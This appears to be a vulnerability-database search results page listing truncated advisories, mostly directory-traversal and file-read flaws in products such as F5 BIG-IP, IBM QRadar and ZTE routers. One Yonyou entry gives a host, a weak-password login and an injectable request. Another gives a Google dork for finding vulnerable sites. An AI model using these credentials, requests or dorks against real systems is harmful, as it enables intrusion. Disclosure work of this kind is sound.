1369 matches found
Design/Logic Flaw
IBM QRadar SIEM 7.1 before MR2 Patch 13 and 7.2 before 7.2.7 uses weak permissions for unspecified directories under the web root, which allows local users to modify data by writing to a file...
CVE-2016-2877
IBM QRadar SIEM 7.1 before MR2 Patch 13 and 7.2 before 7.2.7 uses weak permissions for unspecified directories under the web root, which allows local users to modify data by writing to a file...
Arbitrary File Read Vulnerability in zzcms 7.2 Version
ZZCMS emphasizes investment-promotion and supply-and-demand functions and can be used to quickly build a product investment website. ZZCMS v7.1 has an arbitrary file read vulnerability that can be exploited by an attacker to access restricted directories and execute commands outside the root directory of the web...
File Download Vulnerability in AVTECH Devices
AVTECH, founded in 1996, is one of the world's leading CCTV manufacturers. The main products are surveillance equipment, network cameras, network video recorders and so on. A file download vulnerability exists in AVTECH devices. As the cab file request authenticated by the streamd web server is t...
ZKTeco ZKBioSecurity 3.0 - Directory Traversal
ZKTeco ZKBioSecurity 3.0 File Path Manipulation Vulnerability Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd Product web page: http://www.zkteco.com Affected version: 3.0.1.0R230 Platform: 3.0.1.0R230 Personnel: 1.0.1.0R1916 Access: 6.0.1.0R1757 Elevator:...
PHP Power Browse 1.2 Path Traversal
Exploit Title: PHP Power Browse v1.2 - Path Traversal Google Dork: intitle:PHP Power Browse inurl:browse.php Exploit Author: Manuel Mancera sinkmanu | sinkmanu at gmail dot com Software URL: https://github.com/arzynik/PHPPowerBrowse Version: 1.2 Vulnerability Type : Path traversal Severity : High...
CVE-2016-5307
Summary: CVE-2016-5307 is a directory traversal vulnerability in the Symantec Endpoint Protection Manager (SEPM) management console, affecting SEPM 12.1 installations prior to 12.1 RU6 MP5. The issue permits remote authenticated users to read arbitrary files within the web-root directory tree via...
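A Yonyou system: from weak password to SQL injection to getshell
Brief description: weak password, SQL injection, getshell Detailed description: System address: http://vip.ufida.com.cn/Frame/Index.aspx Weak-password account: adminnc Password: adminnc An injection was found in the self-service query function (login required; note that the cookie expires) GET http://vip.ufida.com.cn/RepositorySearchInfo/DoctInfo.aspx?ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f HTTP/1.1 Accept: text/html, application/xhtml+xml, /...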
F5 BIG-IP Directory Traversal Vulnerability
F5 BIG-IP products provide organizations with integrated application delivery services such as acceleration, security, access control and high availability. A directory traversal vulnerability exists in the configuration program of F5 BIG-IP versions prior to 12.0.0, Enterprise Manager versions...
F5 BIG-IP - BIG-IP Configuration utility vulnerability CVE-2015-4040
The remote host is missing a security patch. SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/h:f5:big-ip"; if description...
CVE-2015-4040
Directory traversal vulnerability in the configuration utility in F5 BIG-IP before 12.0.0 and Enterprise Manager 3.0.0 through 3.1.1 allows remote authenticated users to access arbitrary files in the web root via unspecified vectors...
Directory traversal
Directory traversal vulnerability in the configuration utility in F5 BIG-IP before 12.0.0 and Enterprise Manager 3.0.0 through 3.1.1 allows remote authenticated users to access arbitrary files in the web root via unspecified vectors...
PT-2015-6396
Name of the Vulnerable Software and Affected Versions F5 BIG-IP versions prior to 12.0.0 Enterprise Manager versions 3.0.0 through 3.1.1 Description A directory traversal issue exists in the configuration utility, allowing remote authenticated users to access arbitrary files in the web root...
F5 Networks BIG-IP : BIG-IP Configuration utility vulnerability (K17253)
Directory traversal vulnerability in the configuration utility in F5 BIG-IP before 12.0.0 and Enterprise Manager 3.0.0 through 3.1.1 allows remote authenticated users to access arbitrary files in the web root via unspecified vectors. CVE-2015-4040 Impact An authenticated user is able to traverse...
E-Detective Lawful Interception System LFD / Code Execution
Advisory: E-Detective Lawful Interception System multiple security vulnerabilities Date: 14/06/2015 CVE: unassigned Authors: Mustafa Al-Bassam https://musalbas.com slipstream/RoL https://twitter.com/TheWack0lian Software: Decision Group E-Detective Lawful Interception System Vendor URL:...
CVE-2014-8605
The XCloner plugin 3.1.1 for WordPress and 3.5.1 for Joomla! stores database backup files with predictable names under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to a backup file in administrators/backups/...
Directory traversal
Directory traversal vulnerability in the FTP server on Honeywell Excel Web XL1000C50 52 I/O, XL1000C100 104 I/O, XL1000C500 300 I/O, XL1000C1000 600 I/O, XL1000C50U 52 I/O UUKL, XL1000C100U 104 I/O UUKL, XL1000C500U 300 I/O UUKL, and XL1000C1000U 600 I/O UUKL controllers before 2.04.01 allows...
VulnCheck KEV: CVE-2014-4019
ZTE ZXV10 W300 router with firmware W300V1.0.0aZRDLK stores sensitive information under the web root with insufficient access control, which allows remote attackers to read backup files via a direct request for rom-0...